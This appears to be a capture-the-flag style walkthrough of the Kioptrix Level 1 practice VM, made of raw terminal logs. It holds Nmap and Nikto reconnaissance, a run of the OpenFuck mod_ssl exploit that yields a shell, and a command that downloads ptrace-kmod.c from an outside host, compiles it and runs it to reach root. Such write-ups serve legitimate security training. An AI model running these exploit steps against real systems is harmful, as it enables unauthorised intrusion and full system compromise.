Kioptrix Level 1
Infomation gathering
nmap
root@kali:~# nmap -p 0-65535 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 21:53 PST
Nmap scan report for 192.168.1.104
Host is up (0.00012s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
root@kali:~# nmap -V -p 0-65535 192.168.1.104
Nmap version 7.80 ( https://nmap.org )
Platform: x86_64-pc-linux-gnu
Compiled with: liblua-5.3.3 openssl-1.1.1d libssh2-1.8.0 libz-1.2.11 libpcre-8.39 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6
Compiled without:
Available nsock engines: epoll poll select
root@kali:~# nmap -vv -p 0-65535 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 21:53 PST
Initiating ARP Ping Scan at 21:53
Scanning 192.168.1.104 [1 port]
Completed ARP Ping Scan at 21:53, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating SYN Stealth Scan at 21:53
Scanning 192.168.1.104 [65536 ports]
Discovered open port 443/tcp on 192.168.1.104
Discovered open port 22/tcp on 192.168.1.104
Discovered open port 80/tcp on 192.168.1.104
Discovered open port 111/tcp on 192.168.1.104
Discovered open port 139/tcp on 192.168.1.104
Discovered open port 1024/tcp on 192.168.1.104
Completed SYN Stealth Scan at 21:53, 3.07s elapsed (65536 total ports)
Nmap scan report for 192.168.1.104
Host is up, received arp-response (0.00012s latency).
Scanned at 2019-12-06 21:53:24 PST for 3s
Not shown: 65530 closed ports
Reason: 65530 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
111/tcp open rpcbind syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
443/tcp open https syn-ack ttl 64
1024/tcp open kdm syn-ack ttl 64
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.21 seconds
Raw packets sent: 65537 (2.884MB) | Rcvd: 65540 (2.622MB)
oot@kali:~# nikto -h 192.168.1.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.104
+ Target Hostname: 192.168.1.104
+ Target Port: 80
+ Start Time: 2019-12-06 21:54:11 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 20:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2019-12-06 21:54:23 (GMT-8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/usr/share/exploitdb/exploits/unix/remote# ./764 0x6b 192.168.1.104
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--03:14:30-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
03:14:32 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[-] Unable to attach: Operation not permitted
bash: [937: 1] tcsetattr: Invalid argument
bash-2.05$
bash-2.05$ ifconfig
ifconfig
bash: ifconfig: command not found
bash-2.05$ /sbin/ifconfig
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:7C:3A:16
inet addr:192.168.1.104 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1
RX packets:133 errors:0 dropped:0 overruns:0 frame:0
TX packets:146 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:23878 (23.3 Kb) TX bytes:16669 (16.2 Kb)
Interrupt:11 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:6 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:420 (420.0 b) TX bytes:420 (420.0 b)
bash-2.05$
whoami
root
评论
发表评论